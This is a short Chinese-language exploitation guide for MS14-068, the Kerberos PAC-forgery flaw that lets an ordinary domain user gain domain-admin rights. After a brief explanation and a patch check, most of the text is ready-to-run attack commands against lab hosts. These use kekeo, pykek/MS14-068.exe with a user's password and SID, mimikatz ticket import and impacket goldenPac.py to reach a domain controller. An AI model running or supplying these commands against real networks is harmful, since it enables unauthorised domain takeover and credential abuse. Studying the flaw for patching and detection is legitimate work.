域渗透|MS14-068

MS14-068

MS14-068

https://www.se7ensec.cn/2021/10/20/%E5%9F%9F%E6%B8%97%E9%80%8F-Kerberos%E5%9F%9F%E8%AE%A4%E8%AF%81%E6%9C%BA%E5%88%B6%E5%89%96%E6%9E%90/#PAC-1

MS14068是一个能够使普通用户提权到域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。

这个漏洞中主要的问题是存在于KDC会根据客户端指定PAC中数字签名的加密算法，以及PAC的加密算法，来校验PAC的合法性。这使得攻击者可通过伪造PAC，修改PAC中的SID，导致KDC判断攻击者为高权限用户，从而导致权限提升漏洞的产生。

漏洞补丁地址: https://technet.microsoft.com/zh-cn/library/security/MS14-068

利用方式

MS14-068对应的补丁为KB3011780，可在域控上通过systeminfo查看是否安装此补丁。

systeminfo|find "3011780"

keoko

klist purge		清除票据
kekeo "exploit::ms14068 /domain:rootkit.org /user:sqladmin /password:Admin12345 /ptt" "exit"

Pykek

py：https://github.com/mubix/pykek
exe：https://github.com/ianxtianxt/MS14-068

参数说明：

-u 域账号@域名称
-p 为当前用户的密码
-s 为当前用户的SID值，可以通过whoami/all来获取用户的SID值
-d 为当前域的域控
–rc4 为当前用户的Hash

1. 通过dir来访问域控的共享文件夹，提示拒绝访问。

   dir \\OWA2013.rootkit.org\c$

2. 生成票据

   MS14-068.exe -u [email protected] -p Admin12345 -s S-1-5-21-3759881954-2993291187-3577547808-1613 -d OWA2013.rootkit.org

3. 脚本执行成功会在当前目录下生成一个ccache文件，票据导入之前cmd下使用命令klist purge，或者在mimikatz中使用kerberos::purge删除当前缓存的kerberos票据。

   klist purge

4. 使用mimikatz导入生成的ccache文件

   mimikatz "kerberos::ptc [email protected]" exit

   再次dir访问域控共享就可以成功访问。

   goldenPac

impacket工具包里面的goldenPac.py，这个工具是结合ms14-068加psexec的产物，利用起来十分顺手。

python goldenPac.py -dc-ip 192.168.3.144 -target-ip 192.168.3.144 rootkit.org/sqladmin:[email protected]

参考

https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2014/ms14-068
https://daiker.gitbook.io/windows-protocol/kerberos/3#0x00-qian-yan
https://cloud.tencent.com/developer/article/1760132
https://www.cnblogs.com/backlion/p/6820744.html